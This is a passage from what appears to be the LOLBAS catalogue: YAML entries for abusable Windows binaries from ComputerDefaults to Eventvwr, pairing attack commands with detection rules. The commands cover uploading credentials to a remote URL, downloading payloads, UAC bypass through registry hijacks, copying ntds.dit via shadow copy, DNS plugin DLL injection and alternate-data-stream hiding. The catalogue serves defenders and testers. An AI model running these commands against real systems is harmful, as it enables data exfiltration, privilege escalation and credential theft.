Handle: '@eral4m' ================================================ FILE: yml/OSBinaries/ComputerDefaults.yml ================================================ --- Name: ComputerDefaults.exe Description: ComputerDefaults.exe is a Windows system utility for managing default applications for tasks like web browsing, emailing, and media playback. Author: Eron Clarke Created: 2024-09-24 Commands: - Command: ComputerDefaults.exe Description: Upon execution, ComputerDefaults.exe checks two registry values at HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\open\command; if these are set by an attacker, the set command will be executed as a high-integrity process without a UAC prompt being displayed to the user. See 'resources' for which registry keys/values to set. Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. Category: UAC Bypass Privileges: User MitreID: T1548.002 OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\ComputerDefaults.exe - Path: C:\Windows\SysWOW64\ComputerDefaults.exe Detection: - IOC: Event ID 10 - IOC: A binary or script spawned as a child process of ComputerDefaults.exe - IOC: Changes to HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\open\command - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml Resources: - Link: https://gist.github.com/havoc3-3/812547525107bd138a1a839118a3a44b Acknowledgement: - Person: Eron Clarke ================================================ FILE: yml/OSBinaries/ConfigSecurityPolicy.yml ================================================ --- Name: ConfigSecurityPolicy.exe Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. You can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads. Author: Ialle Teixeira Created: 2020-09-04 Commands: - Command: ConfigSecurityPolicy.exe {PATH_ABSOLUTE} {REMOTEURL} Description: Upload file, credentials or data exfiltration in general Usecase: Upload file Category: Upload Privileges: User MitreID: T1567 OperatingSystem: Windows 10 - Command: ConfigSecurityPolicy.exe {REMOTEURL} Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 Tags: - Download: INetCache Full_Path: - Path: C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml - IOC: ConfigSecurityPolicy storing data into alternate data streams. - IOC: Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS. - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe. - IOC: User Agent is "MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)" Resources: - Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-switch-workloads - Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/workloads - Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-monitor - Link: https://twitter.com/NtSetDefault/status/1302589153570365440?s=20 Acknowledgement: - Person: Ialle Teixeira Handle: '@NtSetDefault' - Person: Nir Chako (Pentera) Handle: '@C_h4ck_0' ================================================ FILE: yml/OSBinaries/Conhost.yml ================================================ --- Name: Conhost.exe Description: Console Window host Author: Wietze Beukema Created: 2022-04-05 Commands: - Command: conhost.exe {CMD} Description: Execute a command line with conhost.exe as parent process Usecase: Use conhost.exe as a proxy binary to evade defensive counter-measures Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD - Command: conhost.exe --headless {CMD} Description: Execute a command line with conhost.exe as parent process Usecase: Specify --headless parameter to hide child process window (if applicable) Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD Full_Path: - Path: c:\windows\system32\conhost.exe Detection: - IOC: conhost.exe spawning unexpected processes - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_conhost_susp_child_process.yml Resources: - Link: https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/ - Link: https://twitter.com/Wietze/status/1511397781159751680 - Link: https://twitter.com/embee_research/status/1559410767564181504 - Link: https://twitter.com/ankit_anubhav/status/1561683123816972288 Acknowledgement: - Person: Adam Handle: '@hexacorn' - Person: Wietze Handle: '@wietze' ================================================ FILE: yml/OSBinaries/Control.yml ================================================ --- Name: Control.exe Description: Binary used to launch controlpanel items in Windows Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: control.exe {PATH_ABSOLUTE}:evil.dll Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS). Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism Category: ADS Privileges: User MitreID: T1218.002 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - Command: control.exe {PATH_ABSOLUTE:.cpl} Description: Execute .cpl file. A CPL is a DLL file with CPlApplet export function) Usecase: Use to execute code and bypass application whitelisting Category: Execute Privileges: User MitreID: T1218.002 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL Full_Path: - Path: C:\Windows\System32\control.exe - Path: C:\Windows\SysWOW64\control.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules-emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml - Elastic: https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml - IOC: Control.exe executing files from alternate data streams - IOC: Control.exe executing library file without cpl extension - IOC: Suspicious network connections from control.exe Resources: - Link: https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/ - Link: https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/ - Link: https://twitter.com/bohops/status/955659561008017409 - Link: https://docs.microsoft.com/en-us/windows/desktop/shell/executing-control-panel-items - Link: https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/ Acknowledgement: - Person: Jimmy Handle: '@bohops' ================================================ FILE: yml/OSBinaries/Csc.yml ================================================ --- Name: Csc.exe Description: Binary file used by .NET Framework to compile C# code Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: csc.exe -out:{PATH:.exe} {PATH:.cs} Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in the specified .cs file and output the compiled version to the specified .exe path. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: csc -target:library {PATH:.cs} Description: Use csc.exe to compile C# code, targeting the .NET Framework, stored in the specified .cs file and output the compiled version to a DLL file with the same name. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe - Path: C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_parent.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_folder.yml - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml - IOC: Csc.exe should normally not run as System account unless it is used for development. Resources: - Link: https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/ ================================================ FILE: yml/OSBinaries/Cscript.yml ================================================ --- Name: Cscript.exe Description: Binary used to execute scripts in Windows Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: cscript //e:vbscript {PATH_ABSOLUTE}:script.vbs Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS). Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: WSH Full_Path: - Path: C:\Windows\System32\cscript.exe - Path: C:\Windows\SysWOW64\cscript.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml - Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - IOC: Cscript.exe executing files from alternate data streams - IOC: DotNet CLR libraries loaded into cscript.exe - IOC: DotNet CLR Usage Log - cscript.exe.log Resources: - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ================================================ FILE: yml/OSBinaries/CustomShellHost.yml ================================================ --- Name: CustomShellHost.exe Description: A host process that is used by custom shells when using Windows in Kiosk mode. Author: Wietze Beukema Created: 2021-11-14 Commands: - Command: CustomShellHost.exe Description: Executes explorer.exe (with command-line argument /NoShellRegistrationCheck) if present in the current working folder. Usecase: Can be used to evade defensive counter-measures Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE Full_Path: - Path: C:\Windows\System32\CustomShellHost.exe Detection: - IOC: CustomShellHost.exe is unlikely to run on normal workstations - Sigma: https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_lolbin_customshellhost.yml Resources: - Link: https://twitter.com/YoSignals/status/1381353520088113154 - Link: https://docs.microsoft.com/en-us/windows/configuration/kiosk-shelllauncher Acknowledgement: - Person: John Carroll Handle: '@YoSignals' ================================================ FILE: yml/OSBinaries/DataSvcUtil.yml ================================================ --- Name: DataSvcUtil.exe Description: DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application. Author: Ialle Teixeira Created: 2020-12-01 Commands: - Command: DataSvcUtil /out:{PATH_ABSOLUTE} /uri:{REMOTEURL} Description: Upload file, credentials or data exfiltration in general Usecase: Upload file Category: Upload Privileges: User MitreID: T1567 OperatingSystem: Windows 10 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe Code_Sample: - Code: https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6 Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml - IOC: The DataSvcUtil.exe tool is installed in the .NET Framework directory. - IOC: Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS. - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil. Resources: - Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe - Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services - Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services Acknowledgement: - Person: Ialle Teixeira Handle: '@NtSetDefault' ================================================ FILE: yml/OSBinaries/Desktopimgdownldr.yml ================================================ --- Name: Desktopimgdownldr.exe Description: Windows binary used to configure lockscreen/desktop image Author: Gal Kristal Created: 2020-06-28 Commands: - Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:{REMOTEURL} /eventName:desktopimgdownldr Description: Downloads the file and sets it as the computer's lockscreen Usecase: Download arbitrary files from a web server Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: c:\windows\system32\desktopimgdownldr.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml - IOC: desktopimgdownldr.exe that creates non-image file - IOC: Change of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP\LockScreenImageUrl Resources: - Link: https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/ Acknowledgement: - Person: Gal Kristal Handle: '@gal_kristal' ================================================ FILE: yml/OSBinaries/DeviceCredentialDeployment.yml ================================================ --- Name: DeviceCredentialDeployment.exe Description: Device Credential Deployment Author: Elliot Killick Created: 2021-08-16 Commands: - Command: DeviceCredentialDeployment Description: Grab the console window handle and set it to hidden Usecase: Can be used to stealthily run a console application (e.g. cmd.exe) in the background Category: Conceal Privileges: User MitreID: T1564 OperatingSystem: Windows 10 Full_Path: - Path: C:\Windows\System32\DeviceCredentialDeployment.exe Detection: - IOC: DeviceCredentialDeployment.exe should not be run on a normal workstation - Sigma: https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml Acknowledgement: - Person: Elliot Killick Handle: '@elliotkillick' ================================================ FILE: yml/OSBinaries/Dfsvc.yml ================================================ --- Name: Dfsvc.exe Description: ClickOnce engine in Windows used by .NET Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication {REMOTEURL} Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host) Usecase: Use binary to bypass Application whitelisting Category: AWL Bypass Privileges: User MitreID: T1127.002 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: ClickOnce - Execute: Remote Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml Resources: - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf - Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe Acknowledgement: - Person: Casey Smith Handle: '@subtee' ================================================ FILE: yml/OSBinaries/Diantz.yml ================================================ --- Name: Diantz.exe Description: Binary that package existing files into a cabinet (.cab) file Author: Tamir Yehuda Created: 2020-08-08 Commands: - Command: diantz.exe {PATH_ABSOLUTE:.exe} {PATH_ABSOLUTE}:targetFile.cab Description: Compress a file (first argument) into a CAB file stored in the Alternate Data Stream (ADS) of the target file. Usecase: Hide data compressed into an Alternate Data Stream. Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1. Tags: - Type: Compression - Command: diantz.exe {PATH_SMB:.exe} {PATH_ABSOLUTE:.cab} Description: Download and compress a remote file and store it in a CAB file on local machine. Usecase: Download and compress into a cab file. Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019 Tags: - Type: Compression - Command: diantz /f {PATH:.ddf} Description: Execute diantz directives as defined in the specified Diamond Definition File (.ddf); see resources for the format specification. Usecase: Bypass command-line based detections Category: Execute Privileges: User MitreID: T1036 OperatingSystem: Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019 Tags: - Type: Compression Full_Path: - Path: c:\windows\system32\diantz.exe - Path: c:\windows\syswow64\diantz.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml - IOC: diantz storing data into alternate data streams. - IOC: diantz getting a file from a remote machine or the internet. Resources: - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz - Link: https://ss64.com/nt/makecab-directives.html Acknowledgement: - Person: Tamir Yehuda Handle: '@tim8288' - Person: Hai Vaknin Handle: '@vakninhai' ================================================ FILE: yml/OSBinaries/Diskshadow.yml ================================================ --- Name: Diskshadow.exe Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS). Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: diskshadow.exe /s {PATH:.txt} Description: Execute commands using diskshadow.exe from a prepared diskshadow script. Usecase: Use diskshadow to exfiltrate data from VSS such as NTDS.dit Category: Dump Privileges: User MitreID: T1003.003 OperatingSystem: Windows server Tags: - Execute: CMD - Command: diskshadow> exec {PATH:.exe} Description: Execute commands using diskshadow.exe to spawn child process Usecase: Use diskshadow to bypass defensive counter measures Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows server Tags: - Execute: CMD Full_Path: - Path: C:\Windows\System32\diskshadow.exe - Path: C:\Windows\SysWOW64\diskshadow.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diskshadow.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml - IOC: Child process from diskshadow.exe Resources: - Link: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ Acknowledgement: - Person: Jimmy Handle: '@bohops' ================================================ FILE: yml/OSBinaries/Dnscmd.yml ================================================ --- Name: Dnscmd.exe Description: A command-line interface for managing DNS servers Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll {PATH_SMB:.dll} Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details. Usecase: Remotely inject dll to dns server Category: Execute Privileges: DNS admin MitreID: T1543.003 OperatingSystem: Windows server Tags: - Execute: DLL - Execute: Remote Full_Path: - Path: C:\Windows\System32\Dnscmd.exe - Path: C:\Windows\SysWOW64\Dnscmd.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml - IOC: Dnscmd.exe loading dll from UNC/arbitrary path Resources: - Link: https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 - Link: https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html - Link: https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp - Link: https://twitter.com/Hexacorn/status/994000792628719618 - Link: http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html Acknowledgement: - Person: Shay Ber - Person: Dimitrios Slamaris Handle: '@dim0x69' - Person: Nikhil SamratAshok Handle: '@nikhil_mitt' ================================================ FILE: yml/OSBinaries/Esentutl.yml ================================================ --- Name: Esentutl.exe Description: Binary for working with Microsoft Joint Engine Technology (JET) database Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: esentutl.exe /y {PATH_ABSOLUTE:.source.vbs} /d {PATH_ABSOLUTE:.dest.vbs} /o Description: Copies the source VBS file to the destination VBS file. Usecase: Copies files from A to B Category: Copy Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: esentutl.exe /y {PATH_ABSOLUTE:.exe} /d {PATH_ABSOLUTE}:file.exe /o Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file. Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: esentutl.exe /y {PATH_ABSOLUTE}:file.exe /d {PATH_ABSOLUTE:.exe} /o Description: Copies the source Alternate Data Stream (ADS) to the destination EXE. Usecase: Extract hidden file within alternate data streams Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: esentutl.exe /y {PATH_SMB:.exe} /d {PATH_ABSOLUTE}:file.exe /o Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file. Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: esentutl.exe /y {PATH_SMB:.source.exe} /d {PATH_SMB:.dest.exe} /o Description: Copies the source EXE to the destination EXE file Usecase: Use to copy files from one unc path to another Category: Download Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d {PATH_ABSOLUTE:.dit} Description: Copies a (locked) file using Volume Shadow Copy Usecase: Copy/extract a locked file such as the AD Database Category: Copy Privileges: Admin MitreID: T1003.003 OperatingSystem: Windows 10, Windows 11, Windows 2016 Server, Windows 2019 Server Full_Path: - Path: C:\Windows\System32\esentutl.exe - Path: C:\Windows\SysWOW64\esentutl.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_params.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml - Elastic: https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml Resources: - Link: https://twitter.com/egre55/status/985994639202283520 - Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/ - Link: https://twitter.com/bohops/status/1094810861095534592 Acknowledgement: - Person: egre55 Handle: '@egre55' - Person: Mike Cary Handle: '@grayfold3d' ================================================ FILE: yml/OSBinaries/Eudcedit.yml ================================================ --- Name: Eudcedit.exe Description: Private Character Editor Windows Utility Author: Matan Bahar Created: 2025-08-07 Commands: - Command: eudcedit Description: Once executed, the Private Charecter Editor will be opened - click OK, then click File -> Font Links. In the next window choose the option "Link with Selected Fonts" and click on Save As, then in the opened enter the command you want to execute. Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. Category: UAC Bypass Privileges: Administrator MitreID: T1548.002 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD - Application: GUI Full_Path: - Path: c:\windows\system32\eudcedit.exe - Path: c:\windows\syswow64\eudcedit.exe Detection: - IOC: Processes spawned by eudcedit.exe. Resources: - Link: https://medium.com/@matanb707/windows-fonts-exploitation-in-2025-bypassing-uac-with-eudcedit-915599705639 Acknowledgement: - Person: Matan Bahar Handle: '@Bl4ckShad3' ================================================ FILE: yml/OSBinaries/Eventvwr.yml ================================================ --- Name: Eventvwr.exe Description: Displays Windows Event Logs in a GUI window. Author: Jacob Gajek Created: 2018-11-01 Commands: - Command: eventvwr.exe Description: During startup, eventvwr.exe checks the registry value `HKCU\Software\Classes\mscfile\shell\open\command` for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. Category: UAC Bypass Privileges: User MitreID: T1548.002 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Application: GUI - Execute: EXE - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c "{CMD}" > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe Description: During startup, eventvwr.exe uses .NET deserialization with `%LOCALAPPDATA%\Microsoft\EventV~1\RecentViews` file. This file can be created using https://github.com/pwntester/ysoserial.net Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters. Category: UAC Bypass Privileges: Administrator MitreID: T1548.002 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Application: GUI - Execute: .NetObjects Full_Path: - Path: C:\Windows\System32\eventvwr.exe - Path: C:\Windows\SysWOW64\eventvwr.exe Code_Sample: - Code: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1 Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml - Elastic: https://github.com/elastic/detection-rules/blob/d31ea6253ea40789b1fc49ade79b7ec92154d12a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/eventvwr_uac_bypass.yml - IOC: eventvwr.exe launching child process other than mmc.exe - IOC: Creation or modification of the registry value HKCU\Software\Classes\mscfile\shell\open\command Resources: - Link: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ - Link: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1 - Link: https://twitter.com/orange_8361/status/1518970259868626944 Acknowledgement: - Person: Matt Nelson Handle: '@enigma0x3' - Person: Matt Graeber Handle: '@mattifestation' - Person: Orange 